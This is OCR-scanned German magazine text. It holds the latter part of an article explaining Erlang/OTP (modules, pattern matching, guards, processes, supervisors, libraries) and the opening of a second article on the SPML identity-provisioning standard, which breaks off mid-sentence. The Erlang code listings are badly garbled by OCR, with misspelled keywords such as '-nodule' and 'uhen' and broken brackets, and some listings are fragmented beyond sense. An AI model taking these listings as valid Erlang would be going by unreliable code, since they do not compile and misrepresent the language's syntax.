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Die erste Ebene eines Er- 
lang-Anwendungssystems sind 
Nodes. Jede gestartete virtuelle 
Maschine stellt einen solchen 
Node dar und ist mit weiteren 
Nodes vernetzbar. Diese kön- 
nen auf dem gleichen System 
oder weiteren Rechnern im 
Netz laufen. Allerdings ist es 
nicht möglich, dass ein Node in 
mehrere solcher Netze inte- 
griert ist. Eine Kommunikation 
über Netzgrenzen hinweg ließe 
sich via IP realisieren. Er- 
lang/OTP bringt unter anderem 
umfangreiche CORBA-Biblio- 
theken mit, die im Erlang- 
Sprachgebrauch Module sind. 
Sie fassen Funktionen zusam- 
men und bilden gleichzeitig 
einen Namespace. Innerhalb 
der Module werden die für ei- 
ne externe Nutzung definier- 
ten Funktionen explizit expor- 
tiert (Listing 1). Ein Import ist 
im Gegensatz zu Sprachen wie 
Java oder C# nicht notwendig, 
jedoch möglich. Ein Aufruf der 
Funktionen erfolgt üblicher- 
weise über modul:funktion 
(Argl, Arg2, ...) (Listing 2). 
Alternativ werden Funktionen 
explizit importiert und benöti- 
gen dann das Modul-Präfix 
nicht mehr (Listing 3). 

Wie in der aus der Objekt- 
orientierung bekannten Poly- 
morphie können die innerhalb 
der Module definierten Funk- 
tionen mehrfach in unter- 
schiedlichen Implementierun- 
gen vorliegen. Solange die 
Anzahl der Argumente gleich 
ist, trennt ein Semikolon die 
Definitionen. Innerhalb der 
Funktionen trennen Kommata 
die Anweisungen sequenziell, 
und ein Punkt bezeichnet das 
Ende einer Definition. 


Guards ergänzen 
Pattern Matching 


Die Entscheidung darüber, 
welche Funktionsdefinition 
eine Anwendung bei einem 
Aufruf heranzieht, erfolgt 
über Pattern Matching, teil- 
weise im Zusammenhang mit 
Guards (siehe unten). Nicht 
nur die Funktionsauswahl ba- 
siert auf Pattern Matching, 
Muster spielen auch bei case-, 


Listing 1 


-nodule(nodule_a), 
-export([hello/2)), 
hello(Place, Iho) -> 
io:format("Hello -p, -p", [place(Place), Whol). 
place(world) -> "world"; 
place(earth) -> "earth"; 
place(somenhere) -> "someuhere out there"; 
place(_Any) -> "uherever you are", 


Module exportieren für die 
externe Nutzung definierte 
Funktionen. 


Listing 2 


-nodule(module 
-export(Lcall_ 
call_hello(Pla 

module_a:h 


_b). 
ello/1D. 
e) 

u 


= 


h 
f 
ello(Place, "Joe"). 


Listing 3 


-nodule(module 
\ lo/1)). 


L 
-export(Lcall_hello 
-import(module_a, [hello/2)), 
call_hello(Place) -> 

hello(Place, "Joe"), 


) 
el 
3, 
e) 


Ein Funktionsaufruf erfolgt 
entweder über ein Modul- 
Präfix (Listing 2) oder über 
eine Import-Anweisung 
(Listing 3). 


receive- und try-Anweisungen 
sowie beim Match-Operator 
(=) eine Rolle. Hierbei gleicht 
der Compiler ein Muster ge- 
gen einen Ausdruck ab. Das 
Muster kann ungebundene 
Variablen enthalten, die eine 
Anwendung bei einem pas- 
senden Muster setzt (Lis- 
ting 4). Auf diese Weise extra- 
hiert ein Programm Werte aus 
Tupeln, liest sie vom Anfang 
einer Liste oder weist sie di- 
rekt zu. So ist es auch zu ver- 
stehen, dass es sich bei einem 
Gleichheitszeichen nicht um 
eine reine Zuweisung handelt. 
Im Falle der angesprochenen 
Funktionsauswahl kommt die 
zum Tragen, die zum überge- 
benen Muster passt. Trifft hin- 
gegen kein Muster zu, gibt es 
einen Fehler. 

Einfache Muster genügen 
jedoch nicht immer. Manch- 
mal muss man sicherstellen, 
dass ein Argument den richti- 
gen Typ hat, manchmal soll er 
sich auch in einem vorgegebe- 
nen Wertebereich bewegen. 
Denkbar wäre beispielsweise 
eine Buchungsvariante A bei 
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Programmiersprachen 


Listing 4 


-nodule(module_d), 

-export(Llist_nax/1]). 

List_max([Head|Rest]) -> 
# Check rest against the first element. 
List_max(Rest, Head), 

List_max([], ResultSofar) -> 
# List to test is empty, return result. 
ResultSofar; 

List_max([Head|Rest], ResultSofar) uhen Head > ResultSofar -> 
# This head is the new maxinun result. 
List_max(Rest, Head); 

List_max([Head|Rest], ResultSofar) -> 
# Head is lower or equal, so go on with the rest. 
List_max(Rest, ResultSofar). 


-nodule(module_e), 

-export([book/3]), 

book(Amount, From, To) uhen is_float(Amount), Anount < 1000.0 -> 
book(Anount, From, To) when is_float(Amount), Amount > 10000.0 -> 
book(Anount,, From, To) when is_float(Anount) -> 


bookCAnything, Fron, To) -> 
throw(illegal_data_type). 


Listing 6 


-nodule(module_f), 
-export(Lstart/1]). 
start(Initial$tate) -> 
register(ny_server, spaun(module_f, Loop, LInitial$tate])), 
k Process loop. 
loop(State) -> 
receive 
{do_this, Arg!, Arg2} -> 
NeuState = handle_this(Arg1, Arg2, State), 
loop(NeuState); 
{do_that, Arg1} -> 
Neustate = handle_that(Argl, State), 
Loop(NeuState); 
stop -> 
ok 


end. 
% handle_this and handle_that have to return the new state. 


Das Muster 
bestimmt die Wahl 
der Funktion. 


Guards ergänzen 
das Pattern 
Matching. 


Zustände von 
Prozessen werden 
über die 
Argumente 
abgebildet. 


einem Betrag kleiner 1000 Eu- 
ro, Variante B bei 1000 bis un- 
ter 10 000 Euro und Variante 
C bei 10 000 Euro und mehr. 
Hier kommen die Guards zum 
Einsatz (Listing 5). Bei der 
Definition der Guards sind 
Verknüpfungen via „und“ 
(Komma) sowie „oder“ (Semi- 
kolon) möglich. Gemeinsam 
erlauben das Pattern Matching 
und Guards die intelligente 
und flexible Organisation des 
Codes. 


Variablen sind 
unveränderbar 


Erlang ist sequenziell funk- 
tional ausgelegt. Jede Funk- 
tion liefert das Ergebnis des 
letzten Ausdrucks zurück. 
Wie viele funktionale Spra- 
chen verfügt Erlang über 
Higher Order Functions, die 
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sich bei der Entwicklung von 
Modulen wie lists als hilf- 
reich erweisen. Das lists-Mo- 
dul bietet Funktionen wie fil- 
ter, fold, foreach und map 
zur Anwendung anonymer 
Funktionen auf Listen. Das 
Ergebnis sind neue Listen 
oder im Falle von fold das 
berechnete Ergebnis. Listen 
selbst lassen sich nicht verän- 
dern. Gleiches gilt für Tupel, 
Records oder beliebige ande- 
re Variablen. Hier stutzen 
Umsteiger in der Regel: Er- 
lang-Variablen lassen sich 
nach einer initialen Zuwei- 
sung nicht mehr modifizie- 
ren. Die Motivation hierfür 
liegt unter anderem in der 
Vermeidung von Seiteneffek- 
ten. So führt in vielen Spra- 
chen die Modifikation von 
Variablen, die als Referenz 
an eine Funktion übergeben 
werden, häufig zu schwer 


nachvollziehbaren Fehlern. 
Dies vermeidet Erlang. Gleich- 
zeitig erleichtern Variablen mit 
einmaliger Zuweisung die 
Realisierung der wichtigsten 
Spracheigenschaft neben dem 
funktionalen Charakter: der 
Nebenläufigkeit. 

Prozesse sind in Erlang 
leichtgewichtig und unabhän- 
gig vom Betriebssystem aus- 
gelegt. Ihre Ausführung er- 
folgt durch die virtuelle 
Maschine, sodass sie sich auf 
unterschiedlichen Plattformen 
einheitlich verhalten. Gleich- 
zeitig sorgt die VM für die 
Aufteilung der Prozesse auf 
die konfigurierten Kerne oder 
Prozessoren. Der Datenaus- 
tausch zwischen den Prozes- 
sen erfolgt im Gegensatz zu 
vielen Thread-Implementie- 
rungen nicht im Shared Me- 
mory. Vielmehr verfügt jeder 
Prozess über eine eigene 
Message Queue, an die weite- 
re Prozesse — auch über Node- 
Grenzen hinweg — Nachrichten 
senden können. Mittels receive 
und dem bereits genannten 
Pattern Matching kann der 
Empfänger die Nachrichten 
selektiv auslesen und verar- 
beiten. Über endrekursive Auf- 
rufe lassen sich so interne 
Dienste implementieren, die 
mit einem kleinen Trick auch 
über einen Status verfügen 
können (Listing 6). Dieses 
Verfahren findet sich in einer 
Vielzahl der mitgelieferten 
Module wieder. 

Die so erzeugten Prozesse 
kann man entweder anonym 
starten — in diesem Fall müs- 
sen aufrufende Prozesse die 
Prozess-ID kennen — oder sie 
mit einem einmaligen Namen 
registrieren. Dieser lässt sich 
dann für das Versenden der 
Nachricht nutzen. Als Opera- 
tor hierfür fungiert das Ausru- 
fezeichen (/) (Listing 7). 
Allerdings wird es in der Re- 
gel in exportierten Komfort- 
funktionen versteckt, sodass 
der Entwickler nicht immer 
auf den ersten Blick entdeckt, 
dass seine Anwendung asyn- 
chron mit einem Prozess 
kommuniziert. Auch beim 
Laufzeitverhalten fällt das 
nicht auf. So können Erlang- 


Nodes problemlos mehrere 
10 000 Prozesse parallel be- 
treiben und dabei je nach Sys- 
temlast dennoch Antwortzeiten 
kleiner als eine Millisekunde 
liefern. Die effizient arbeiten- 
de Garbage Collection trägt 
hierzu bei. 

Wie erwähnt lassen sich 
mehrere Nodes vernetzen. Ei- 
ne einfache Authentifizierung 
soll das unbefugte Integrieren 
von Nodes verhindern. Jeder 
Knoten verfügt über einen 
automatisch oder manuell ver- 
gebenen Namen. Über diesen 
kann man Prozesse auf ent- 
fernten Nodes starten oder 
vorhandene ansprechen. Bis 
auf diesen Namen unterschei- 
den sich der lokale und der 
entfernte Nachrichtenversand 
nicht. Das Marshalling der 
Daten erfolgt für den Nutzer 
vollkommen transparent. Zu- 
sätzlich zu den Spracheigen- 
schaften unterstützen mitge- 
lieferte Module die Arbeit 
mit Prozessen auf unterschied- 
lichen Knoten. Auf diese Wei- 
se sind verteilte Systeme leicht 
zu implementieren. 

Diverse weitere Eigen- 
schaften erleichtern die Ent- 
wicklung von Anwendungs- 
systemen. Supervisor Trees 
können Prozesse automatisch 
informieren, wenn ein Kind- 
prozess stirbt, Gleiches lässt 
sich manuell über Links oder 
Monitors erreichen, ebenfalls 
wieder über Node-Grenzen 
hinweg oder für ganze Nodes. 
So kann eine Anwendung 
Fehler korrigieren oder auto- 
matisch die Funktionen eines 
fehlerhaften Knotens überneh- 
men. Konstrukte für die Aus- 
nahmebehandlung sowie die 
Fähigkeit, Software-Upgrades 
zur Laufzeit durchzuführen, 
erhöhen die Stabilität und 
Systemlaufzeit zusätzlich. 


Mehr als nur eine 
Programmiersprache 


Eine Programmiersprache mit 
ihren Eigenschaften ist nur 
eine Hälfte dessen, was den 
Einsatzzweck und den Erfolg 
einer Plattform ausmacht. 
Heutzutage beurteilt man eine 
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Listing 7 


-nodule(module_g). 
-export([server_test/0]). 
server_test() -> 
nodule_f:start(0), 
ny_server ! {do_this, 4711, foo}, 
ny_server ! {do_that, bar}, 
ny_server ! stop. 


Nachrichten lassen sich 
an die Prozess-ID oder 
einen registrierten Namen 
senden. 


Sprache immer im Zu- 
sammenhang mit ihren Bi- 
bliotheken und Laufzeitumge- 
bungen. Dies gilt auch für 
Erlang. Neben einer Vielzahl 
hilfreicher Module bietet das 
System unter dem Namen 
Open Telecom Platform (OTP) 
und den dazugehörigen OTP 
Design Principles spezielle 
Module und Vorgaben für 
die komfortable Entwicklung 
skalierbarer und robuster An- 
wendungssysteme. 

Wesentliche Bestandteile 
der Design Principles sind 
Supervisor Trees und Beha- 
viours. Supervisor Trees in- 
formieren sich gegenseitig, 
sollte in einer Umgebung mit 
verknüpften Prozessen einer 
der Prozesse ausfallen. Erlang 
unterscheidet zwei Prozess- 
typen: Die einen arbeiten 
(Worker), und die anderen pas- 
sen auf sie auf (Supervisor). 
Oftmals kommen in einem 
Supervisor Tree viele Prozes- 
se mit gleichartigen Struktu- 
ren zum Einsatz, zum Beispiel 
als Server oder als Event 
Handler. Diese Ähnlichkeiten 
werden über Behaviours for- 
malisiert. 

Beim Aufruf einer Funktion 
aus einem anderen Modul kann 
auch eine Variable den Namen 
des aufrufenden Moduls fest- 
legen. Dies machen sich viele 
Erlang-Module zu Nutze, um 
Grundfunktionen ähnlich zu 
abstrakten Oberklassen in der 
objektorientierten Programmie- 
rung in generische Module 
auszulagern. Ein eigenes Mo- 
dul, das ein solch generisches 
Modul nutzen soll, muss nur 
vorgegebene Funktionen im- 
plementieren und seinen eige- 
nen Namen als Argument an 
die Funktionsaufrufe des ge- 
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nerischen Moduls übergeben. 
Dieses verwendet für seine 
Arbeit nun die Funktionen 
des eigenen Moduls. Der Me- 
chanismus hierfür heißt Call- 
back. Über Behaviours kann 
ein generisches Modul festle- 
gen, welche Funktionen ein 
Callback-Modul zu imple- 
mentieren hat. Fehlen diese, 
gibt der Compiler eine War- 
nung aus. 

Eine Erlang-Applikation 
wird über das gleichnamige 
Modul und seine Konfigura- 
tion festgelegt. Ein Callback- 
Modul definiert die Funktio- 
nen für den Start und den 
Stop der Anwendung, oft- 
mals nur für den Start eines 
Supervisors. Gleichzeitig de- 
finiert eine Konfiguration in 
der Erlang-typischen Nota- 
tion aus Tupeln und Listen 
dieses Callback-Modul. Die 
Konfigurationsdatei enthält die 
Beschreibung des Moduls, sei- 
ne Version, darin registrierte 
Prozesse sowie in ihm ent- 
haltene weitere Anwendun- 
gen und Konfigurationen. Der 
Start der Applikation erfolgt 
in der mitgelieferten Shell per 
application:start{app_name). 
Über das System-Init lässt 
sich dieser Vorgang automa- 
tisieren. 

Für die Erstellung ganzer 
Distributionen mit einer Teil- 
menge des Systemumfangs 
kommen Releases zum Ein- 
satz. Nach der Definition des 
Release Resource File erzeugt 
systools das Boot Script sowie 
die Release Packages. Die re- 
sultierende TAR-Datei enthält 
alle notwendigen Dateien für 
das System mit den parallel 
laufenden Applikationen. 

Die Callbacks des Supervi- 
sor-Moduls zum Aufbau des 
Prozessbaums definieren nur 
die Funktion init(Args), die 
die Konfiguration der verwal- 
teten Supervisor und Worker 
festlegt. Sie definiert, ob die 
Prozesse einmalig oder per- 
manent laufen, ob sie einzeln 
oder alle im Fehlerfall neu ge- 
startet werden, wie sie ge- 
stoppt werden und in welcher 
Frequenz ein Prozess termi- 
nieren darf, bevor der Super- 
visor selbst seine Arbeit been- 
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Programmiersprachen 


det. Allein dies sorgt bereits 
für stabile Systeme. 

Hingegen werden die Wor- 
ker als Callbacks für das Mo- 
dul gen_server ausgelegt. Sie 
müssen Funktionen für die In- 
itialisierung und Terminierung, 
für die Verarbeitung synchro- 
ner und asynchroner Nachrich- 
ten sowie für den Umgang mit 
Updates im laufenden Betrieb 
implementieren. Ein Mecha- 
nismus zur Verwaltung von 
Zuständen ist enthalten. Ins- 
gesamt entbindet dieses Mo- 
dul den Entwickler von stupi- 
der Low-Level-Arbeit bei der 
Entwicklung eigener Server- 
Prozesse. 

Weitere interessante Modu- 
le der OTP bieten eine generi- 
sche Event Engine inklusive 
vorgefertigter Handler-Modu- 
le für Logging und Warnmel- 
dungen sowie einen gene- 
rischen endlichen Automat. 
Ferner gibt es Mechanismen 
für die Verteilung von Appli- 
kationen auf unterschiedliche 
Nodes inklusive eines priori- 
tätsgesteuerten automatischen 
Takeover und Failover von 
Prozessen. Schließlich erfol- 
gen über Konfigurationsda- 
teien gesteuerte automatische 
Updates von Applikationen 
und Releases. Alles zusam- 
men beschert dem Ericsson 
AXD301 ATM Switch eine 
nahezu unglaubliche Verfüg- 
barkeit von 99,9999999 Pro- 
zent (9NINES). 


Module für 
fast alle Aufgaben 


Außerhalb der OTP gehören 
noch viele weitere hilfreiche 
Module zum Lieferumfang 
von Erlang. Heutzutage un- 
umgänglich ist eine umfang- 
reiche Netzbibliothek. So 
deckt Erlang von TCP und 
UDP über SSL und SSH bis 
HTTP, FTP und TFTP alle 
wichtigen Protokolle ab, zu- 
dem unterstützt die Plattform 
das Media Gateway Control 
Protocol (Megaco)/H.248. 
Weiterhin befinden sich vie- 
le Module rund um CORBA 
und SNMP im Lieferumfang. 
Zusammen mit den vorhan- 


118 


den Kryptofähigkeiten (unter 
anderem MD5, SHA, DES, 
AES, RSA, DSS) lassen sich 
so leistungsfähige Server- 
und Clientlösungen imple- 
mentieren. 

Für die in diesen Systemen 
oftmals benötigten persisten- 
ten Daten stehen ebenfalls 
unterschiedliche Lösungen zur 
Verfügung. Sind nur einfache 
Daten zu speichern, kann man 
ein eigenes Modul für einfache 
Tabellen im Dateisystem im- 
plementieren, sollen hierfür 
hingegen relationale Daten- 
banksysteme zum Einsatz 
kommen, erfolgt der Zugriff 
über ODBC. Wer kein Dritt- 
system integrieren muss, kann 
auf Erlangs mitgeliefertes 
DBMS Mnesia zurückgreifen. 
Das leistungsfähige System 
ist auf den kontinuierlichen 
Betrieb mit nahezu Echtzeit- 
verhalten ausgelegt, verfügt 
über ein hybrides Datenmo- 
dell für Relationen und Ob- 
jekte, kennt unterschiedliche 
Strategien, lässt sich replizie- 
ren und fragmentieren und 
bettet sich mit seiner API für 
Transaktionen und Abfragen 
nahtlos in Erlang ein. 

Weitere Module unterstüt- 
zen den Entwickler mit 
unterschiedlichen Speicher- 
strukturen, der Verarbeitung 
regulärer Ausdrücke, ASN.l 
und LALR-I, dem Lesen und 
Schreiben von ZIP-Dateien, 
dem Zugriff auf die Win- 
dows-Registry, Prozess-Spoo- 
ling, Heartbeats und einem 
einfachen Grafiksystem. Auch 
für die eigentliche Entwick- 
lungsarbeit bringt Erlang eine 
Vielzahl von Werkzeugen 
mit. Eine eigene IDE fehlt 
zwar, jedoch gibt es eine di- 
rekte Unterstützung für den 
Emacs. Neben dem Compiler 
und einer Shell für die inter- 
aktive Ausführung bringt Er- 
lang integrierte Applikationen 
für das Debugging, Unit Tes- 
ting, Cross References, Cove- 
rage, Profiling, die Generie- 
rung von Dokumentationen, 
Process Monitoring, Applica- 
tion Monitoring, Crashdump 
Analysis und Scripting mit. 
Einige dieser Applikationen 
führt das System zeichen- 


orientiert in der Shell aus, 
andere verfügen über ein 
grafisches Frontend oder las- 
sen sich im Webbrowser be- 
trachten. 

Wem dies nicht genügt, 
dem stehen eine Vielzahl 
weiterer Bibliotheken und Ap- 
plikationen im Netz zur Verfü- 
gung. Aus dem Comprehen- 
sive Erlang Archive Network 
(CEAN) beispielsweise lassen 
sich Anwendungen direkt in 
die Laufzeitumgebung instal- 
lieren oder aktualisieren. 

Erlang/OTP ist eine Ni- 
schenplattform, aber aus der 
Nische entwickelt sich entspre- 
chend dem Bedarf an skalier- 
barer Software in Multicore-/ 
Multiprozessor-Umgebungen 
langsam eine immer interes- 
santer und bekannter werden- 
de Menge an Lösungen. Na- 
türlich findet sich Erlang in 
seinem ursprünglichen Anwen- 
dungsgebiet wieder, dem Er- 
icsson AXD301 ATM Switch, 
dem Ericsson GPRS System, 
dem Alteon (Nortel) SSL Ac- 
celerator, dem T-Mobile UK 
SMS System, und auch Mo- 
torola hat die Plattform für 
VoIP-Lösungen evaluiert. Mit 
Yaws existiert ein hoch ska- 
lierbarer und flexibler Web 
Application Server für stati- 
sche und dynamisch generier- 
te Seiten. Der Server wird in 
verschiedenen Softwaresys- 
temen produktiv eingesetzt. 
Ein im Jabber-Umfeld gern 
genutzter Daemon ist der ejab- 
berd, der ebenfalls in Erlang 
entwickelt wurde. Interessan- 
te Datenbanklösungen sind 
die CouchDB, die eine REST- 
ful-HTTP/JSON-API bietet 
und so von jeder Sprache aus 
leicht zu nutzen ist, sowie 
Amazons SimpleDB. Im Gra- 
fiksektor findet sich mit Wings 
3D eine auf Erlang basieren- 
de Applikation. Last but not 
least steht für Entwickler mit 
Tsung ein Multi-Protocol 


Erlang _www.erlang.org 
Ericsson www.erlang.se 
CEAN  cean.process-one.net 


Distributed Load Testing Tool 
zur Verfügung. 


Fazit 


Die zukünftige Verbreitung 
von Erlang ist schwer einzu- 
schätzen. Der Bedarf an auf 
Parallelverarbeitung basie- 
renden Anwendungssystemen 
steigt, die Anzahl der hierfür 
zur Verfügung stehenden 
Plattformen ist überschaubar. 
Erlang ist nach inzwischen 20 
Jahren Entwicklungszeit mit 
dem Release R12B stabil und 
ausgereift und erlaubt kom- 
pakte, robuste und skalierbare 
Lösungen. So betrug der Er- 
lang-Codeumfang der Evaluie- 
rung bei Motorola weniger als 
25 Prozent des C++-Codes. 
Allerdings erscheint die Nota- 
tion vielen Entwickler gewöh- 
nungsbedürftig, was sicherlich 
eine Hürde darstellt. 

Dafür wird Erlang jedoch 
seinen Einfluss auf Alternati- 
ven haben. Inwiefern diese 
auf Java oder .Net basieren, 
oder es sich um komplett ei- 
genständige Entwicklungen 
handelt, bleibt abzuwarten. 
Viele der positiven Eigen- 
schaften sind nicht in der 
Sprache, sondern der VM be- 
gründet. Leichtgewichtige Pro- 
zesse, asynchrones Messaging, 
nicht modifizierbare Varia- 
blen — dies muss eine Alterna- 
tive schon bieten. Vielleicht 
wäre hier eine Sprache im C- 
Style mit einer direkten Über- 
setzung nach Erlang der er- 
folgreichere Ansatz. (ka) 
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Benutzerverwaltung 


SPML: Standard für Identity Provisioning 


Multiple Profile 


Martin Raepple 


In komplexen IT-Umgebungen besitzen Anwender viele Persönlichkeiten. 
Wer die zahlreichen Identitäten über System- und Unternehmens- 
grenzen hinweg in den Griff bekommen will, braucht leistungsfähige 
Konzepte. Als offener Standard soll die Service Provisioning Markup 
Language die entsprechenden Prozesse automatisieren. 


etzwerkzugang, E-Mail- 
N “= oder Zutritts- 

karte: alles grundlegen- 
de Voraussetzungen, ohne 
die der reibungslose Ablauf 
vieler Unternehmensprozesse 
nicht möglich wäre. Das tritt 
häufig erst dann ins Bewusst- 
sein, wenn man die genannten 
Dinge beispielsweise nach ei- 
nem Job- oder Projektwechsel 
neu beschaffen muss. Dann 
heißt es Anträge ausfüllen oder 
erst einmal die Zugangsdaten 
des Kollegen mitbenutzen, bis 
die IT-Abteilung das Benut- 
zerkonto eingerichtet hat. In 
diesen Versorgungsprozessen, 
allgemein unter dem Begriff 
Provisioning zusammenge- 
fasst, steckt meist viel Handar- 
beit und ein entsprechend ho- 
her administrativer Aufwand. 
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Inkonsistente Datenbestände, 
lange Wartezeiten und eine 
frustrierte Anwenderschaft 
sind oft die Folge. 

Die stetig wachsende An- 
zahl von Benutzerkonten pro 
Mitarbeiter sowie regulatori- 
sche Vorgaben zur Erhöhung 
des Sicherheitsniveaus zählen 
zu den wichtigsten Gründen, 


warum sich das systemgestütz- 
te Verwalten digitaler Iden- 
titäten (Identity Management) 
in den vergangenen Jahren zu 
einem der bedeutendsten An- 
wendungsgebiete für das Pro- 
visioning entwickelt hat. Das 
User oder Identity Provisioning 
zählt neben einer unterneh- 
mensweiten Rollenverwaltung 


und Steuerung von Freigabe- 
prozessen für den Zugriff auf 
Ressourcen zu den zentralen 
Funktionen moderner Identity- 
Management-Systeme. Über 
Letztere erhalten Angestellte 
von zentraler Stelle aus Zu- 
gang zu den Anwendungssys- 
temen entsprechend ihrer Rol- 
le in der Organisation. 
Konkret befasst sich das 
Identity Provisioning mit dem 
Automatisieren aller Vorgänge, 
die den Lebenszyklus digitaler 
Identitäten steuern (Erstellen, 
Ändern, Deaktivieren, Lö- 
schen). Ein typischer Anwen- 
dungsfall ist die Einstellung ei- 
nes neuen Mitarbeiters, dessen 
Stammdaten zunächst im Per- 
sonalsystem erfasst werden. Er 
benötigt in der Regel Benutzer- 
konten in mehreren Systemen, 
was in historisch gewachsenen 
IT-Landschaften regelmäßig 
komplizierte technische Ver- 
teilungsprozesse auslöst. 


Sicher durch 


saubere Konten 


Identity Provisioning kann 
dafür sorgen, dass diese Vor- 
gänge schnell, konsistent und 
nachvollziehbar bleiben. Glei- 
ches gilt bei sich ändernden 
Aufgaben und Positionen so- 
wie dem Entzug aller Berech- 
tigungen (De-Provisioning), 
wenn ein Mitarbeiter die Fir- 
ma verlässt. Laut einer ak- 
tuellen Sicherheitsstudie, die 
dem Identitätsdiebstahl mittels 
Phishing, Password Stealern, 
Keyloggern und anderen An- 
griffswerkzeugen ein hohes 
Risiko bescheinigt, liefern 
durchgängig automatisierte 
Versorgungsprozesse auch ei- 
nen wesentlichen Beitrag zur 


K-TRACT 


@ Identity Provisioning kümmert sich um alle Prozesse, die für die Administration verteilter 
Benutzerinformationen notwendig sind. 


e Als offener Standard definiert die Service Provisioning Markup Language [SPML) ein hersteller- 
übergreifendes XML-Protokoll zur Steuerung des Lebenszyklus beliebiger IT-naher Ressourcen. 


e SPML wird hauptsächlich im Identity Provisioning eingesetzt. Hier gibt es etliche kommerzielle 
Implementierungen des Standards sowie eine aktive Open Source Community. 
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Verbesserung der Informa- 
tionssicherheit im Unterneh- 
men: Ungenutzte Benutzer- 
konten lassen sich sofort 
deaktivieren und dienen so 
nicht länger als Einfallstore für 
interne oder externe Angriffe 
(siehe iX-Link am Ende des 
Textes oder den Kasten „On- 
linequellen“). Weitere An- 
wendungsfelder für das Iden- 
tity Provisioning finden sich 
im User-Help-Desk. Dazu ge- 
hört beispielsweise das Zu- 
rücksetzen von Passwörtern, 
das der Anwender selbst initi- 
ieren und weitgehend automa- 
tisiert durchführen darf. 

Die Kommunikation zwi- 
schen den zahlreichen Provi- 
sionierungslösungen und den 
Zielsystemen, deren Benut- 
zerkonten und Berechtigun- 
gen zentral verwaltet werden 
sollen, erzeugt einen hohen In- 
tegrationsaufwand. Dem Ar- 
tenreichtum an Datenbanken, 
Verzeichnisdiensten und an- 
wendungsspezifischen Benut- 
zerverwaltungen in einer hete- 
rogenen Umgebung versuchen 
die Hersteller mit plattform- 
spezifischen Konnektoren oder 
lokalen Agenten zu begegnen, 
und können dennoch in der 
Regel keine vollständige Ab- 
deckung aller Zielsysteme er- 
reichen. Ordnung in das baby- 
lonische Sprachgewirr aus 
Protokollen und Formaten will 
das Standardisierungsgremium 
OASIS mit der Service Pro- 
visioning Markup Language 
(SPML) bringen. Die in der zu- 
ständigen Arbeitsgruppe (Pro- 
visioning Services Technical 
Committee, PSTC) vertretenen 
Firmen wie BMC, CA, SAP 
und Sun hatten bereits 2003 die 
erste Version zu Papier ge- 
bracht. Drei Jahre später folgte 
die umfangreich überarbeitete 
Spezifikation zu SPML 2.0. 

Hauptanliegen der Spra- 
che ist es, die Funktionen für 
die Provisionierung, deren 
Syntax und Nachrichtenpro- 
tokoll plattformübergreifend 
zu vereinheitlichen. SPML 
bedient sich dazu bei den 
üblichen Verdächtigen: Die 
auf einem einfachen Re- 
quest/Response-Protokoll ba- 
sierenden Operationen wer- 
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Eigenschaft 


Core Operations 
Async Capability 
Batch Capability 
Bulk Capability 
Password Capability 
Search Capability 
Suspend Capability 
Updates Capability 


Reference Capability 


Beschreibung 

Basisoperationen, die jede standardkonforme 
Implementierung unterstützen muss 

asynchrone Verarbeitung von SPML Requests 
Stapelverarbeitung von mehreren SPML Requests 
Bearbeitung mehrerer PSOs in einem SPML Request 


Operationen zum Prüfen und Ändern von Passwörter 


Suchoperation, die einen Iterator zur 


schrittweisen Abarbeitung des Suchergebnisses liefert 
Aktivieren und Deaktivieren von PS0s 


gleiche Funktion wie die Bulk-Operationen, liefert 
aber einen Iterator zur schrittweisen Abarbeitung 
der von der Änderung betroffenen PSOs zurück 
ermöglicht die Definition von Beziehungen zwischen 
PSOs (zum Beispiel Gruppenmitgliedschaften von 


Benutzern) auf generische Weise, das heißt unabhängig 
von deren Schema. Reference Capability definiert keine 
eigenen Operationen, sondern lässt sich mit den 
Basisoperationen anwenden. 


den mit XML formuliert und 
in SOAP-Nachrichten für den 
Transport eingebunden. Ver- 
sion 1.0 spezifizierte ledig- 
lich eine Menge an Basisope- 
rationen. 2.0 fasst diese zu 
den Core Operations zusam- 
men und erweitert sie um so- 
genannte Capabilities, die 
weitere optionale, fachlich 
verwandte Funktionen eines 
Provisionierungssystems be- 
schreiben (siehe Tabelle „Pro- 
visionierungsoperationen in 
SPML 2.0“). Wem das nicht 
genügt, der kann sich bei den 
Extended Operations in SPML 
1.0 beziehungsweise den Cus- 
tom Capabilites in SPML 2.0 
bedienen, die ein formales 
Modell des Standards für pro- 
duktspezifische Erweiterungen 
definieren. 


Ein Protokoll 
für alle 


Über die Inhalte der mit den 
Nachrichten übertragenen Ob- 
jekte, im SPML-Jargon als 
Provisioning Service Objects 
(PSOs) bezeichnet, trifft die 
Spezifikation keine Aussagen. 
Dagegen spricht zum einen der 
Wunsch nach einem universel- 
len Protokoll, das nicht nur den 
Lebenszyklus von Benutzer- 
konten und Berechtigungen 
steuern soll. Zum anderen ist es 
selbst für ein abgrenzbares An- 
wendungsgebiet wie das Iden- 
tity Provisioning nur schwer 
möglich, ein industrie- und 


branchenweit gültiges Daten- 
modell für Benutzer und deren 
Attribute verbindlich festzule- 
gen. Die Unterschiede auf se- 
mantischer und struktureller 
Ebene sind hier so groß, dass 
ein Standard allenfalls eine 
Empfehlung aussprechen kann, 
an der das PSTC gerade arbei- 
tet (SPML Standard Schema). 

Dennoch sieht die Spezifi- 
kation vor, dass jedes Zielsys- 
tem von Provisionierungsan- 
fragen, formal als Provisioning 
Service Target (PST) bezeich- 
net, die Datenmodelle der von 
ihm verwalteten PSOs bezie- 
hungsweise Identitäten über 
XML Schema (XSD) be- 
schreiben kann. Andere Teil- 
nehmer können die vom PST 
unterstützten Identitätsschema 
über die Core Operation list- 
Targets in Erfahrung bringen, 
um anschließend entspre- 
chende SPML Requests (zum 
Beispiel Anlegen eines neuen 
Benutzerkontos) mit den rich- 
tigen Attributen zu formulie- 
ren. Für einfache Datenstruk- 
turen steht als Alternative zu 
XSD eine eigene, schon mit 
Version SPML 1.0 eingeführ- 
te Schemasprache zur Verfü- 
gung, deren Wortschatz sich 
aber im Wesentlichen auf die 
einfache Deklaration von At- 
tributen beschränkt. 

Neben PSOs und PSTs zäh- 
len zwei weitere Komponenten 
zu dem auf abstrakter Ebene 
beschriebenen Domänenmo- 
dell, das die grundsätzliche 
Rollenverteilung und Bezie- 


Operationen 
add, lookup, modify, delete, listTargers 


cancel, status 

Batch 

bulkModity, bulkDelete 

setPassword, expirePassword, resetPassword, 
validatePassword 

seurch, iterate, closelterator 


suspend, resume, active 
updates, iterate, closelterator 


hung zwischen den Teilneh- 
mern in einem durchgängigen 
Provisionierungsszenario regelt 
(Abbildung 1). In der Rolle der 
sogenannten Requesting Au- 
thority initiiert ein Personal- 
system im gewählten Beispiel 
den Versorgungsprozess und 
schickt standardkonforme Pro- 
visionierungsanfragen (SPML 
